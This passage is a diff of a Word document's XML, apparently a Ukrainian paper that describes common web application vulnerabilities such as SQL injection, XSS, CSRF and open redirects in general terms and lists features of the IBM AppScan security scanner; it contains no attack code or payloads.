+        <w:t>сторінки на предмет вразливостей, та допомагає користувачеві сфокусуватись на проблемах, зосереджених на клієнтській стороні.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Звітність: в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>иходячи з ваших вимог, ви можете створювати звіти в бажаних форматах і включати потрібні поля в ньому.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Настроювані політики сканування: AppScan поставляється з набором певних політик сканування. Ви можете налаштувати політику відповідно до ваших потреб.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>П</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідтримка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>інструментів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>в наявності є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> інструменти, такі як Authentication Tester, Token Analy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">zer і HTTP Request Editor, які можуть бути використані </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>при тестуванні на наявність вразливостей вручну.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ідтримка</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ajax </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dojo frameworks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24783,6 +25498,23 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -25122,19 +25854,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+        <w:t>Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25240,6 +25960,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -25385,19 +26106,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25534,6 +26243,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Вразливість</w:t>
       </w:r>
       <w:r>
@@ -25682,7 +26392,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
@@ -25833,6 +26542,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
       </w:r>
       <w:r>
@@ -26109,19 +26819,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>використання випадкових імен п</w:t>
+        <w:t>Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен п</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26361,6 +27059,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
       </w:r>
     </w:p>
@@ -26372,8 +27071,6 @@
         <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -26393,362 +27090,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Main features in Appscan:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>The Rational Appscan 8.5 Standard edition has many new features, most of which I cover in the brief outline below:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>AMF protocol is also supported.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Web services scanning: Web service scanning is one area which organizations are looking for a more effective automated support, and Appscan has scored well in this area.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Java script security </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>analyzer :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Reporting: Based on your requirements, you can generate reports in desired formats and include desired fields in it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with the remediation notes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
